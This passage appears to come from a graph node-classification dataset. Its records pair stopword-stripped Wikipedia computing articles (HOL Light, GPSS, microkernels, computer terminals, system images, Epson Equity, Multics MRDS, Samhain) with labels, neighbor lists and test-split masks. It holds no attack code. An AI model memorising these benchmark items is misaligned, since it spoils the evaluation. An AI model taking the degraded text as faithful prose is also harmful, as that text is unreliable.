    "text": "HOL_Light:hol light hol light member hol theorem prover family like members proof assistant classical higher order logic compared hol systems hol light intended relatively simple foundations hol light authored maintained mathematician computer scientist john harrison hol light released simplified bsd license hol light based formulation type theory equality primitive notion primitive rules inference following formulation type theory close one described section ii.2",
    "neighbors": [
      9320,
      11028,
      4791,
      9816,
      4446
    ],
    "mask": "None"
  },
  {
    "node_id": 7186,
    "label": 9,
    "text": "GPSS:gpss general purpose simulation system gpss discrete time simulation general-purpose programming language simulation clock advances discrete steps system modelled transactions enter system passed one service represented blocks another used primarily process flow oriented simulation language particularly well-suited problems factory gpss developed ibm geoffrey gordon beginning 1960s named gordon programable simulation system name changed ibm decided release product general program part new name create standard waiting-line simulations original releases ibm 7044 7090 mainframes subsequently releases ibm 360 univac 1108 cdc time implementations languages targeted different size systems developed including dec vax specialized apl version large-scale univac systems macintosh among others gpss java general purpose simulation system java-based tool developed teach gpss simulation language gpss resembles lego structure blocks chosen modeller specific functions imitate particular system language neither procedural object-oriented functional programming world simulated entities moving model entities called transactions envisioned moving block block block line code represents unit actions affects transaction entities blocks facility-oriented machines job shop transaction-oriented parts work-in-process signals electronic components documents bureaucratic procedure gpss automatically keep track statistics brings fixed form end simulation standard report gpss one oldest language candidate first object-oriented approach transactions truly instances model objects blocks methods modern concept oop entities broadly classified resources computational entities statistical entities resources like facilities storages represent limited capacity resources computational entities like ampervariables variables functions random generators used represent state transactions elements environment statistical entities like queues tables histograms collect statistical information interest following example taken simulation using gpss hello world gpss illustrate main concepts aim simulate one day operation barber shop customers arrive random constant flow enter shop queue barber busy get hair cut first-come first-served basis leave shop wish know average maximum waiting line well number customers program comprised codice_1 codice_2 statements divided model segments control cards first segment models customers codice_3 block creates flow transactions schedules enter model inter-arrival time uniformly distributed range 18±6 programmer responsibility interpret transaction customers understand time counted minutes transactions start existence codice_3 block progress block block according certain rules reach codice_5 remove model normally transactions progress one block next one customer transactions leave codice_3 block enter codice_7 block block simulates waiting line collects statistics accordingly example materialize line chairs end simulation know among things maximum queue size many chairs needed average waiting time codice_8 block requires name queue parameter one queue may exist model one associated codice_9 block triggered transaction leaves queue gpss remembers transactions queue possible know average time spent check buggy transaction leaving queue without previously entering codice_10 block transaction try proceed codice_11 block block simulating capture facility named joe facilities model single servers capacity one facility busy codice_12 deny attempting transaction right enter example customer wait codice_8 block free soon becomes available transaction allowed capture facility mark busy others transactions start count service time statistics transaction passes corresponding codice_14 block codice_12 codice_16 pairs linked facility name many independent facilities may exist model model operators like barber repairman agent also pieces equipment like crane gas station authorization document etc. fact anything capacity one simulate multiple parallel servers like team five barbers oven capacity 10 gpss uses entities named codice_17s customer seizes joe proceeds next statement codice_18 whose task freeze entity prescribed length time random number picked 16-4=12 16+4=20mn service time distributions available gpss codice_19 somehow different notion function programming languages time transactions allowed move model blocking facilities may exist model joe facility busy frozen customer prescribed time customer wake proceed next statement free joe codice_5 next transaction previous block customer sitting chair able codice_11 select next transaction gpss uses first-come first-served basis priority selection policies programmed direct manipulation future event chain entity parallel first segment simulating customer behavior second model segment simulates end day time 480mn 8h entity codice_3d codice_5 next block time codice_5 parameter 1 meaning special counter decreased 1 counter reaches 0 program stops output printed special counter set codice_25 statement example set one thus simulation finish one run 480 mn simulated time output contains indicates joe busy 86.0 time gave hair cut 26 customers hair cut took 15.88 minutes average incidentally joe cutting hair customer number 26 simulation closed programming provisions taken barber finish hair cut closing shop indicates also maximum 1 customer observed waiting turn fact number waiting customer average 0.160 total 27 customers enter queue customer number 27 still sitting waiting turn joe closed shop 27 customers 12 served without wait fact queue empty 44.4 time average waiting time 2.851 min average waiting time 15=27-12 customers really wait 5.133 min",
    "neighbors": [
      192,
      421,
      6248,
      5677,
      5775,
      5584,
      2519
    ],
    "mask": "Test"
  },
  {
    "node_id": 7187,
    "label": 3,
    "text": "Microkernel:microkernel computer science microkernel often abbreviated μ-kernel near-minimum amount software provide mechanisms needed implement operating system os mechanisms include low-level address space management thread management inter-process communication ipc hardware provides multiple rings cpu modes microkernel may software executing privileged level generally referred supervisor kernel mode traditional operating system functions device drivers protocol stacks file systems typically removed microkernel instead run user space terms source code size microkernels often smaller monolithic kernels minix 3 microkernel example approximately 12,000 lines code microkernels trace roots back danish computer pioneer per brinch hansen tenure danish computer company regnecentralen led software development efforts rc 4000 computer 1967 regnecentralen installing rc 4000 prototype polish fertilizer plant puławy computer used small real-time operating system tailored needs plant brinch hansen team became concerned lack generality reusability rc 4000 system feared installation would require different operating system started investigate novel general ways creating software rc 4000 1969 effort resulted completion rc 4000 multiprogramming system nucleus provided inter-process communication based message-passing 23 unprivileged processes 8 time protected one another implemented scheduling time slices programs executed parallel initiation control program execution request running programs initiation data transfers peripherals besides elementary mechanisms built-in strategy program execution resource allocation strategy implemented hierarchy running programs parent processes complete control child processes acted operating systems following brinch hansen work microkernels developed since 1970s term microkernel first appeared later 1981 microkernels meant response changes computer world several challenges adapting existing mono-kernels new systems new device drivers protocol stacks file systems low-level systems developed time code normally located monolithic kernel thus required considerable work careful code management work microkernels developed idea services would implemented user-space programs like allowing worked monolithically started stopped like program would allow services easily worked also separated kernel code allow finely tuned without worrying unintended side effects moreover would allow entirely new operating systems built common core aiding os research microkernels hot topic 1980s first usable local area networks introduced mechanisms allowed kernel distributed user space also allowed system distributed across network links first microkernels notably mach proved disappointing performance inherent advantages appeared great major line research late 1990s however time speed computers grew greatly relation networking systems disadvantages performance came overwhelm advantages development terms many attempts made adapt existing systems better performance overhead always considerable efforts required user-space programs moved back kernel 2000 large-scale mach-like efforts ended although apple macos released 2001 uses hybrid kernel called xnu combines heavily modified hybrid osfmk 7.3 kernel code bsd unix kernel also used ios tvos watchos mach-based gnu hurd also functional included testing versions arch linux debian although major work microkernels largely ended experimenters continued development since shown many performance problems earlier designs fundamental limitation concept instead due designer desire use single-purpose systems implement many services possible using pragmatic approach problem including assembly code relying processor enforce concepts normally supported software led new series microkernels dramatically improved performance microkernels closely related exokernels also much common hypervisors latter make claim minimality specialized supporting virtual machines indeed l4 microkernel frequently finds use hypervisor capacity early operating system kernels rather small partly computer memory limited capability computers grew number devices kernel control also grew throughout early history unix kernels generally small even though contained various device drivers file system implementations address spaces increased 16 32 bits kernel design longer constrained hardware architecture kernels began grow larger berkeley software distribution bsd unix began era larger kernels addition operating basic system consisting cpu disks printers bsd added complete tcp/ip networking system number virtual devices allowed existing programs work 'invisibly network growth continued many years resulting kernels millions lines source code result growth kernels prone bugs became increasingly difficult maintain microkernel intended address growth kernels difficulties resulted theory microkernel design allows easier management code due division user space services also allows increased security stability resulting reduced amount code running kernel mode example networking service crashed due buffer overflow networking service memory would corrupted leaving rest system still functional inter-process communication ipc mechanism allows separate processes communicate usually sending messages shared memory strictly speaking also inter-process communication mechanism abbreviation ipc usually refers message passing latter particularly relevant microkernels ipc allows operating system built number small programs called servers used programs system invoked via ipc support peripheral hardware handled fashion servers device drivers network protocol stacks file systems graphics etc ipc synchronous asynchronous asynchronous ipc analogous network communication sender dispatches message continues executing receiver checks polls availability message alerted via notification mechanism asynchronous ipc requires kernel maintains buffers queues messages deals buffer overflows also requires double copying messages sender kernel kernel receiver synchronous ipc first party sender receiver blocks party ready perform ipc require buffering multiple copies implicit rendezvous make programming tricky programmers prefer asynchronous send synchronous receive first-generation microkernels typically supported synchronous well asynchronous ipc suffered poor ipc performance jochen liedtke assumed design implementation ipc mechanisms underlying reason poor performance l4 microkernel pioneered methods lowered ipc costs order magnitude include ipc system call supports send well receive operation making ipc synchronous passing much data possible registers furthermore liedtke introduced concept direct process switch ipc execution incomplete context switch performed sender directly receiver l4 part message passed registers transfers in-register part message without copying furthermore overhead invoking scheduler avoided especially beneficial common case ipc used rpc-type fashion client invoking server another optimization called lazy scheduling avoids traversing scheduling queues ipc leaving threads block ipc ready queue scheduler invoked moves threads appropriate waiting queue many cases thread gets unblocked next scheduler invocation approach saves significant work similar approaches since adopted qnx minix 3 series experiments chen bershad compared memory cycles per instruction mcpi monolithic ultrix microkernel mach combined 4.3bsd unix server running user space results explained mach poorer performance higher mcpi demonstrated ipc alone responsible much system overhead suggesting optimizations focused exclusively ipc limited impact liedtke later refined chen bershad results making observation bulk difference ultrix mach mcpi caused capacity cache-misses concluding drastically reducing cache working set microkernel solve problem client-server system communication essentially synchronous even using asynchronous primitives typical operation client invoking server waiting reply also lends efficient implementation microkernels generally followed l4 lead provided synchronous ipc primitive asynchronous ipc could implemented top using helper threads however experience shown utility synchronous ipc dubious synchronous ipc forces multi-threaded design onto otherwise simple systems resulting synchronization complexities moreover rpc-like server invocation sequentializes client server avoided running separate cores versions l4 deployed commercial products therefore found necessary add asynchronous notification mechanism better support asynchronous communication signal-like mechanism carry data therefore require buffering kernel two forms ipc nonetheless violated principle minimality versions l4 switched asynchronous ipc completely synchronous ipc blocks first party ready unrestricted use could easily lead deadlocks furthermore client could easily mount denial-of-service attack server sending request never attempting receive reply therefore synchronous ipc must provide means prevent indefinite blocking many microkernels provide timeouts ipc calls limit blocking time practice choosing sensible timeout values difficult systems almost inevitably use infinite timeouts clients zero timeouts servers consequence trend towards providing arbitrary timeouts flag indicates ipc fail immediately partner ready approach effectively provides choice two timeout values zero infinity recent versions l4 minix gone path older versions l4 used timeouts qnx avoids problem requring client specify reply buffer part message send call server replies kernel copies data client buffer without wait client receive response explicitly microkernel servers essentially daemon programs like others except kernel grants privileges interact parts physical memory otherwise limits programs allows servers particularly device drivers interact directly hardware basic set servers general-purpose microkernel includes file system servers device driver servers networking servers display servers user interface device servers set servers drawn qnx provides roughly set services offered unix monolithic kernel necessary servers started system startup provide services file network device access ordinary application programs servers running environment user application server development similar ordinary application development rather build-and-boot process needed kernel development additionally many crashes corrected simply stopping restarting server however part system state lost failing server hence approach requires applications cope failure good example server responsible tcp/ip connections server restarted applications experience lost connection normal occurrence networked system services failure less expected may require changes application code qnx restart capability offered qnx high availability toolkit device drivers frequently perform direct memory access dma therefore write arbitrary locations physical memory including various kernel data structures drivers must therefore trusted common misconception means must part kernel fact driver inherently less trustworthy part kernel running device driver user space necessarily reduce damage misbehaving driver cause practice beneficial system stability presence buggy rather malicious drivers memory-access violations driver code opposed device may still caught memory-management hardware furthermore many devices dma-capable drivers made untrusted running user space recently increasing number computers feature iommus many used restrict device access physical memory also allows user-mode drivers become untrusted user-mode drivers actually predate microkernels michigan terminal system mts 1967 supported user space drivers including file system support first operating system designed capability historically drivers less problem number devices small trusted anyway kernel simplified design avoided potential performance problems led traditional driver-in-the-kernel style unix linux windows nt proliferation various kinds peripherals amount driver code escalated modern operating systems dominates kernel code size microkernel must allow building arbitrary operating system services top must provide core functionality minimum includes minimal design pioneered brinch hansen nucleus hypervisor ibm vm since formalised liedtke minimality principle concept tolerated inside microkernel moving outside kernel i.e. permitting competing implementations would prevent implementation system required functionality everything else done usermode program although device drivers implemented user programs may processor architectures require special privileges access i/o hardware related minimality principle equally important microkernel design separation mechanism policy enables construction arbitrary systems top minimal kernel policy built kernel overwritten user level therefore limits generality microkernel policy implemented user-level servers changed replacing servers letting application choose competing servers offering similar services efficiency microkernels contain schedulers manage timers violation minimality principle principle policy-mechanism separation start booting microkernel-based system requires device drivers part kernel typically means packaged kernel boot image kernel supports bootstrap protocol defines drivers located started traditional bootstrap procedure l4 microkernels microkernels simplify placing key drivers inside kernel violation minimality principle lynxos original minix examples even include file system kernel simplify booting microkernel-based system may boot via multiboot compatible boot loader systems usually load statically-linked servers make initial bootstrap mount os image continue bootstrapping key component microkernel good ipc system virtual-memory-manager design allows implementing page-fault handling swapping usermode servers safe way since services performed usermode programs efficient means communication programs essential far monolithic kernels design ipc system makes breaks microkernel effective ipc system must low overhead also interact well cpu scheduling mainstream processors obtaining service inherently expensive microkernel-based system monolithic system monolithic system service obtained single system call requires two mode switches changes processor ring cpu mode microkernel-based system service obtained sending ipc message server obtaining result another ipc message server requires context switch drivers implemented processes function call implemented procedures addition passing actual data server back may incur extra copying overhead monolithic system kernel directly access data client buffers performance therefore potential issue microkernel systems indeed experience first-generation microkernels mach chorusos showed systems based performed poorly however jochen liedtke showed mach performance problems result poor design implementation specifically mach excessive cache footprint liedtke demonstrated l4 microkernel careful design implementation especially following minimality principle ipc costs could reduced order magnitude compared mach l4 ipc performance still unbeaten across range architectures results demonstrate poor performance systems based first-generation microkernels representative second-generation kernels l4 constitutes proof microkernel-based systems built good performance shown monolithic linux server ported l4 exhibits percent overhead native linux however single-server system exhibits advantages microkernels supposed provide structuring operating system functionality separate servers number commercial multi-server systems exist particular real-time systems qnx integrity comprehensive comparison performance relative monolithic systems published multiserver systems furthermore performance seem overriding concern commercial systems instead emphasize reliably quick interrupt handling response times qnx simplicity sake robustness attempt build high-performance multiserver operating system ibm sawmill linux project however project never completed shown meantime user-level device drivers come close performance in-kernel drivers even high-throughput high-interrupt devices gigabit ethernet seems imply high-performance multi-server systems possible security benefits microkernels frequently discussed context security minimality principle microkernels argued direct consequence principle least privilege according code privileges needed provide required functionality minimality requires system trusted computing base tcb kept minimal kernel code executes privileged mode hardware unvetted access data thus violate integrity confidentiality kernel always part tcb minimizing natural security-driven design consequently microkernel designs used systems designed high-security applications including keykos eros military systems fact common criteria cc highest assurance level evaluation assurance level eal 7 explicit requirement target evaluation simple acknowledgment practical impossibility establishing true trustworthiness complex system unfortunately term simple misleading ill-defined least department defense trusted computer system evaluation criteria introduced somewhat precise verbiage b3/a1 classes recent work microkernels focusing formal specifications kernel api formal proofs api security properties implementation correctness first example mathematical proof confinement mechanisms eros based simplified model eros api recently comprehensive set machine-checked proofs performed properties protection model version l4 led referred third-generation microkernels characterised security-oriented api resource access controlled capabilities virtualization first-class concern novel approaches kernel resource management design goal suitability formal analysis besides usual goal high performance examples coyotos nova redox fiasco.oc case sel4 complete formal verification implementation achieved i.e mathematical proof kernel implementation consistent formal specification provides guarantee properties proved api actually hold real kernel degree assurance goes beyond even cc eal7 followed proofs security-enforcement properties api proof demonstrating executable binary code correct translation c implementation taking compiler tcb taken together proofs establish end-to-end proof security properties kernel term nanokernel picokernel historically referred also least one case term nanokernel used refer small kernel one supports nanosecond clock resolution",
    "neighbors": [
      2560,
      3587,
      3082,
      6155,
      6675,
      7187,
      8725,
      10776,
      25,
      1561,
      4637,
      9762,
      4643,
      6180,
      4646,
      5158,
      7217,
      10803,
      9784,
      10809,
      58,
      10813,
      576,
      2625,
      6221,
      10835,
      3160,
      10333,
      97,
      10851,
      11363,
      8295,
      6248,
      4201,
      3178,
      6760,
      8298,
      9835,
      10856,
      7285,
      4727,
      2168,
      9335,
      634,
      1147,
      3197,
      1150,
      639,
      5247,
      11390,
      2179,
      10883,
      7814,
      10891,
      6797,
      10382,
      2704,
      5267,
      9366,
      6296,
      2201,
      9370,
      9882,
      6300,
      7325,
      9887,
      11423,
      3235,
      8879,
      3248,
      178,
      9907,
      6837,
      6329,
      8889,
      5823,
      8388,
      7366,
      1736,
      2248,
      2761,
      9931,
      9932,
      5840,
      7889,
      10962,
      4308,
      7382,
      8410,
      9436,
      1247,
      9441,
      11489,
      1253,
      7403,
      11501,
      5873,
      242,
      5363,
      757,
      9466,
      2811,
      8700,
      9468,
      1278,
      10499,
      1804,
      8976,
      273,
      8977,
      787,
      11026,
      789,
      5397,
      10007,
      11539,
      10016,
      292,
      3876,
      10235,
      2345,
      4908,
      7983,
      2355,
      7477,
      823,
      4409,
      6457,
      6459,
      7483,
      6974,
      7999,
      11075,
      4423,
      1865,
      7497,
      5452,
      6988,
      5457,
      11601,
      7507,
      11262,
      7511,
      5976,
      10590,
      3426,
      8551,
      5484,
      2925,
      7020,
      370,
      4978,
      5492,
      2933,
      7027,
      11123,
      376,
      11635,
      1402,
      8573,
      7039,
      8063,
      10113,
      8069,
      7561,
      394,
      3978,
      4492,
      7057,
      11667,
      5531,
      8092,
      11675,
      2462,
      5022,
      421,
      1445,
      935,
      5029,
      4521,
      9643,
      11180,
      4525,
      11184,
      7601,
      6067,
      10676,
      5049,
      6075,
      6078,
      9151,
      1474,
      11204,
      11205,
      4040,
      8136,
      9166,
      8661,
      9176,
      5598,
      6624,
      10730,
      10731,
      6638,
      8687,
      6128,
      5105,
      10734,
      5619,
      5115,
      3068,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 7188,
    "label": 2,
    "text": "Computer_terminal:computer terminal computer terminal electronic electromechanical hardware device used entering data displaying printing data computer computing system teletype example early day hardcopy terminal predated use computer screen decades acronym crt cathode-ray tube referred computer terminal come refer type screen personal computer early terminals inexpensive devices slow compared punched cards paper tape input technology improved video displays introduced terminals pushed older forms interaction industry related development timesharing systems evolved parallel made inefficiencies user typing ability ability support multiple users machine terminal function terminal confined display input data device significant local programmable data processing capability may called smart terminal fat client terminal depends host computer processing power called dumb terminal thin client personal computer run terminal emulator software replicates function terminal sometimes allowing concurrent use local programs access distant terminal host system terminal first working programmable fully automatic digital turing-complete computer z3 keyboard row lamps show results early user terminals connected computers electromechanical teleprinters/teletypewriters teletypewriter tty teletype model 33 asr originally used telegraphy friden flexowriter keyboard/printer terminals came later included ibm 2741 1965 decwriter la30 1970 respective top speeds teletypes ibm 2741 la30 10 15 30 characters per second although time paper king speed interaction relatively limited early video computer displays sometimes nicknamed glass ttys glass teletypes visual display units vdus used cpu instead relying individual logic gates primitive lsi chips nevertheless quickly became extremely popular input-output devices many different types computer system several suppliers gravitated set common standards datapoint 3300 computer terminal corporation announced 1967 shipped 1969 making one earliest stand-alone display-based terminals solved memory space issue mentioned using digital shift-register design using 72 columns rather later common choice 80 starting datapoint 3300 late 1970s early 1980s dozens manufacturers terminals including lear-siegler adds data general dec hazeltine corporation heath/zenith hewlett packard ibm televideo volker-craig wyse many incompatible command sequences although many used early adm-3 starting point great variations control codes makers gave rise software identified grouped terminal types system software would correctly display input forms using appropriate control codes unix-like systems termcap terminfo files stty utility term environment variable would used data general business basic software example login-time sequence codes sent terminal try read cursor position 25th line contents using sequence different manufacturer control code sequences terminal-generated response would determine single-digit number 6 data general dasher terminals 4 adm 3a/5/11/12 terminals 0 2 tty special features would available programs say set codes use great majority terminals monochrome manufacturers variously offering green white amber sometimes blue screen phosphors amber claimed reduce eye strain terminals modest color capability also available widely used example color version popular wyse wy50 wy350 offered 64 shades character cell intelligent terminal processing usually implying microprocessor built terminals microprocessors real processing input main computer attached would respond quickly keystroke term intelligent context dates 1969. notable examples include ibm 2250 ibm 2260 predecessors ibm 3270 introduced system/360 1964 terminals connected minicomputers mainframe computers often green amber screen typically terminals communicate computer via serial port via null modem cable often using eia rs-232 rs-422 rs-423 current loop serial interface ibm systems communicated coaxial cable using ibm sna protocol many dec data general ncr computers many visual display suppliers competing computer manufacturer terminals expand systems fact instruction design intel 8008 originally conceived computer terminal corporation processor datapoint 2200 introduction ibm 3270 dec vt100 1978 user programmer could notice significant advantages vdu technology improvements yet programmers used features new terminals backward compatibility vt100 later televideo terminals example dumb terminals allowed programmers continue use older software dumb terminals able respond escape sequences without needing microprocessors used multiple printed circuit boards many integrated circuits single factor classed terminal intelligent ability process user-input within terminal—not interrupting main computer keystroke—and send block data time example user finished whole field form terminals early 1980s adm-3a tvi912 data general d2 dec vt52 despite introduction ansi terminals 1978 essentially dumb terminals although later adm tvi models primitive block-send capability common early uses local processing power included features little off-loading data processing host computer added useful features printing local printer buffered serial data transmission serial handshaking accommodate higher serial transfer speeds sophisticated character attributes display well ability switch emulation modes mimic competitor models became increasingly important selling features 1980s especially buyers could mix match different suppliers equipment greater extent advance microprocessors lower memory costs made possible terminal handle editing operations inserting characters within field may previously required full screen-full characters re-sent computer possibly slow modem line around mid 1980s intelligent terminals costing less dumb terminals would years earlier could provide enough user-friendly local editing data send completed form main computer providing even processing possibilities workstations like televideo ts-800 could run cp/m-86 blurring distinction terminal personal computer another motivations development microprocessor simplify reduce electronics required terminal also made practicable load several personalities single terminal qume qvt-102 could emulate many popular terminals day sold organizations wish make software changes frequently emulated terminal types included ansi x3.64 escape code standard produced uniformity extent significant differences remained example vt100 heathkit h19 ansi mode televideo 970 data general d460 qume qvt-108 terminals followed ansi standard yet differences might exist codes function keys character attributes available block-sending fields within forms foreign character facilities handling printers connected back screen term intelligent terminal refer store check-out computer early ibm pcs single color green screens screens terminals screen pc contain character generation hardware video signals video formatting generated video display card pc graphics modes cpu software ibm pc monitor whether green monochrome display 16-color display technically much similar analog tv set without tuner terminal suitable software pc could however emulate terminal capacity could connected mainframe minicomputer data general one could booted terminal emulator mode rom eventually microprocessor-based personal computers greatly reduced market demand conventional terminals 1990s especially thin clients x terminals combined economical local processing power central shared computer facilities retain advantages terminals personal computers today pc telnet clients provide emulation common terminal dec vt100 using ansi escape code standard x3.64 could run x terminals using software cygwin/x microsoft windows x.org server software linux since advent subsequent popularization personal computer genuine hardware terminals used interface computers today using monitor keyboard modern operating systems like linux bsd derivatives feature virtual consoles mostly independent hardware used using graphical user interface gui like x window system one display typically occupied collection windows associated various applications rather single stream text associated single process case one may use terminal emulator application within windowing environment arrangement permits terminal-like interaction computer running command line interpreter example without need physical terminal device even allow running multiple terminal emulators device character-oriented terminal type computer terminal communicates host one character time opposed block-oriented terminal communicates blocks data common type data terminal easy implement program connection mainframe computer terminal server achieved via rs-232 serial links ethernet proprietary protocols text terminal often terminal sometimes text console serial computer interface text entry display information presented array pre-selected formed characters devices use video display cathode-ray tube called video display unit visual display unit vdu video display terminal vdt system console text terminal used operate computer modern computers built-in keyboard display console unix-like operating systems linux freebsd virtual consoles provide several text terminals single computer fundamental type application running text terminal command line interpreter shell prompts commands user executes command press enter includes unix shells interactive programming environments shell commands small applications another important application type text editor text editor occupies full area display displays one text documents allows user edit documents text editor many uses replaced word processor usually provides rich formatting features text editor lacks first word processors used text communicate structure document later word processors operate graphical environment provide wysiwyg simulation formatted output programs telix minicom control modem local terminal let user interact remote servers internet telnet ssh work similarly simplest form text terminal like file writing file displays text reading file produces user enters unix-like operating systems several character special files correspond available text terminals operations special escape sequences control characters codice_1 functions program use easily via library ncurses complex operations programs use terminal specific ioctl system calls application simplest way use terminal simply write read text strings sequentially output text scrolled last several lines typically 24 visible unix systems typically buffer input text enter key pressed application receives ready string text mode application need know much terminal many interactive applications sufficient one common enhancements command line editing assisted libraries readline also may give access command history helpful various interactive command line interpreters even advanced interactivity provided full-screen applications applications completely control screen layout also respond key-pressing immediately mode useful text editors file managers web browsers addition programs control color brightness text screen decorate underline blinking special characters e.g box drawing characters achieve application must deal plain text strings also control characters escape sequences allow move cursor arbitrary position clear portions screen change colors display special characters also respond function keys great problem many different terminals terminal emulators set escape sequences order overcome special libraries curses created together terminal description databases termcap terminfo dumb terminals interpret limited number control codes cr lf etc ability process special escape sequences perform functions clearing line clearing screen controlling cursor position context dumb terminals sometimes dubbed glass teletypes essentially limited functionality mechanical teletype type dumb terminal still supported modern unix-like systems setting environment variable term dumb smart intelligent terminals also ability process escape sequences particular vt52 vt100 ansi escape sequences graphical terminal display images well text graphical terminals divided vector-mode terminals raster mode vector-mode display directly draws lines face cathode-ray tube control host computer system lines continuously formed since speed electronics limited number concurrent lines displayed one time limited vector-mode displays historically important longer used practically modern graphic displays raster-mode descended picture scanning techniques used television visual elements rectangular array pixels since raster image perceptible human eye whole short time raster must refreshed many times per second give appearance persistent display electronic demands refreshing display memory meant graphic terminals developed much later text terminals initially cost much terminals today graphical show images screen modern term graphical terminal thin client thin client typically uses protocol like x11 unix-terminals rdp microsoft windows bandwidth needed depends protocol used resolution color depth modern graphic terminals allow display images color text varying sizes colors fonts type faces early 1990s industry consortium attempted define standard alphawindows would allow single crt screen implement multiple windows behave distinct terminal unfortunately like i2o suffered run closed standard non-members unable obtain even minimal information realistic way small company independent developer could join consortium possibly standard disappeared without trace terminal emulator piece software emulates text terminal past widespread use local area networking broadband internet access many computers would use serial access program communicate computers via telephone line serial device first macintosh released program called macterminal used communicate many computers including ibm pc dec terminal one first terminal programs popular altair win32 console windows emulate physical terminal supports escape sequences ssh telnet programs logging textually remote computers windows including telnet program bundled versions windows often incorporate code process escape sequences terminal emulators unix-like systems example gnome-terminal qterminal xterm terminal.app emulate physical terminals including support escape sequences e.g xterm emulate vt220 tektronix 4010 hardware terminals terminals operate various modes relating send input typed user keyboard receiving system whatever may distinction keys multiple-mode terminals switch modes pressing key block mode thing pressing key whilst key cause input line sent host line-at-a-time mode key rather cause terminal transmit contents character row cursor currently positioned host host-issued prompts different computer operating systems require different degrees mode support terminals used computer terminals posix terminal interface provided unix posix-compliant operating systems accommodate block-mode terminals rarely requires terminal line-at-a-time mode since operating system required provide canonical input mode terminal device driver operating system emulates local echo terminal performs line editing functions host end usually especially host system support non-canonical input mode terminals posix-compliant systems always character-at-a-time mode contrast ibm 3270 terminals connected mvs systems always required block mode block-oriented terminal block mode terminal type computer terminal communicates host blocks data opposed character-oriented terminal communicates host one character time ibm 3270 perhaps familiar implementation block-oriented terminal mainframe computer manufacturers several companies produced block-oriented terminals typically incorporate buffer stores one screen data also stores data attributes indicating appearance color brightness blinking etc also marks data enterable terminal operator vs. protected entry allowing entry numeric information vs. allowing characters etc typical application host sends terminal preformatted panel containing static data fields data may entered terminal operator keys data updates database entry appropriate fields entry complete enter pf key pressed 3270 block data usually data entered operator modified data sent host one transmission 3270 terminal buffer device could updated single character basis necessary existence set buffer address order sba usually preceded data written/overwritten within buffer complete buffer could also read replaced using codice_2 command codice_3 command unformatted formatted case 3270 block-oriented terminals cause less system load host less network traffic character-oriented terminals also appear responsive user especially slow connections since editing within field done locally rather depending echoing host system early terminals limited editing capabilities – 3270 terminals example could check entries valid numerics subsequent smart intelligent terminals incorporated microprocessors supported local processing programmers block-oriented terminals often used technique storing context information transaction progress screen possibly hidden field rather depending running program keep track status precursor html technique storing context url data passed arguments cgi program unlike character-oriented terminal typing character last position screen usually causes terminal scroll one line entering data last screen position block-oriented terminal usually causes cursor wrap — move start first enterable field programmers might protect last screen position prevent inadvertent wrap likewise protected field following enterable field might lock keyboard sound audible alarm operator attempted enter data field allowed",
    "neighbors": [
      6657,
      8732,
      1606,
      1121,
      5733,
      7269,
      10341,
      9324,
      8301,
      7281,
      1147,
      3708,
      8831,
      6797,
      4750,
      3729,
      7325,
      7847,
      2222,
      11442,
      6837,
      5312,
      2756,
      2245,
      1742,
      9438,
      5855,
      1253,
      1776,
      5873,
      5363,
      2804,
      3323,
      7943,
      5384,
      780,
      11023,
      5397,
      8984,
      4385,
      7983,
      823,
      4409,
      7999,
      11075,
      11596,
      2901,
      5463,
      5975,
      8036,
      11112,
      9067,
      3443,
      5492,
      2933,
      9599,
      2945,
      6529,
      4490,
      7053,
      7076,
      421,
      5036,
      2485,
      8631,
      4032,
      4546,
      5572,
      6601,
      5071,
      2519,
      2521,
      1501,
      6627,
      6129,
      8697,
      10747
    ],
    "mask": "None"
  },
  {
    "node_id": 7189,
    "label": 2,
    "text": "System_image:system image computing system image serialized copy entire state computer system stored non-volatile form file system said capable using system images shut later restored exactly state cases system images used backup hibernation example uses image entire machine ram system state written disk system image produced simply copying disk file elsewhere often disk cloning applications many systems complete system image created disk cloning program running within system information held outside disks volatile memory example non-volatile memory like boot roms process image copy given process state given point time often used create persistence within otherwise volatile system common example database management system dbms dbms store state database databases file closed see database dump dbms restarted later information database intact proceed though software never stopped another example would hibernate feature many operating systems state ram memory stored disk computer brought energy saving mode later restored normal operation emulators provide facility save image system emulated video gaming often referred savestate another use code mobility mobile agent migrate machines state saved copying data another machine restarting programming languages provide command take system image program normally standard feature smalltalk inspired flex lisp among languages development languages often quite different many programming languages example lisp programmer may load packages code running lisp implementation using read-eval-print loop usually compiles programs data loaded running lisp system programmer may dump system image containing pre-compiled possibly customized code—and also loaded application data often image executable run machines system image form executable programs distributed—this method often used programs tex emacs largely implemented lisp smalltalk idiosyncratic languages avoid spending time repeating initialization work every time start similar lisp machines booted lisp images called worlds world contains complete operating system applications data single file also possible save incremental worlds contain changes base world saving world lisp machine operating system could optimize contents memory better memory layout compacting data structures sorting data ... although purpose different system image often similar structure core dump",
    "neighbors": [
      2432,
      9218,
      2051,
      1804,
      6424,
      10778,
      3109,
      3366,
      7983,
      823,
      2107,
      8262,
      4423,
      2383,
      2901,
      6502,
      2160,
      2804,
      3066,
      8447
    ],
    "mask": "Test"
  },
  {
    "node_id": 7190,
    "label": 3,
    "text": "Epson_Equity:epson equity epson equity series ibm compatible personal computers manufactured 1985 early '90s epson inc. epson well known dot matrix printers time equity series represents entry growing pc compatible market equity first system introduced equipped intel 8088 cpu one two 5.25 floppy disk drives original equity no-frills offering ran pc standard 4.77 mhz clock rate came 256 kb ram expansion 512 kb required expansion board displayed cga video available expansion slots two half-height drive bays lacked socket 8087 math chip subsequent versions equity i+ apex 100 upped clock rate 10 mhz standard ram 640 kb supported 3.5 inch floppy drives hard disks sported 8087 socket display circuitry monochrome hercules graphics adapter epson bundled utility programs offered decent turnkey functionality novice users equity reliable compatible design half price similarly-configured ibm pc epson often promoted sales bundling one printers cost equity sold well enough warrant furtherance equity line follow-on equity ii equity iii others based i386sx",
    "neighbors": [
      6129,
      4642
    ],
    "mask": "Test"
  },
  {
    "node_id": 7191,
    "label": 2,
    "text": "Multics_Relational_Data_Store:multics relational data store multics relational data store mrds short first commercial relational database management system written pl/1 honeywell multics operating system first sold june 1976 unlike sql systems emerged late 1970s early 80 mrds used command language basic data manipulation equivalent codice_1 codice_2 statements sql operations like creating new database general file management required use separate command program",
    "neighbors": [
      9286,
      10413,
      10286,
      7983,
      6772,
      2901
    ],
    "mask": "Test"
  },
  {
    "node_id": 7192,
    "label": 4,
    "text": "Samhain_(software):samhain software samhain integrity checker host intrusion detection system used single hosts well large unix-based networks supports central monitoring well powerful new stealth features run undetected memory using steganography",
    "neighbors": [
      6372,
      6092,
      3629,
      6606,
      7983,
      8399,
      2045,
      2901,
      823,
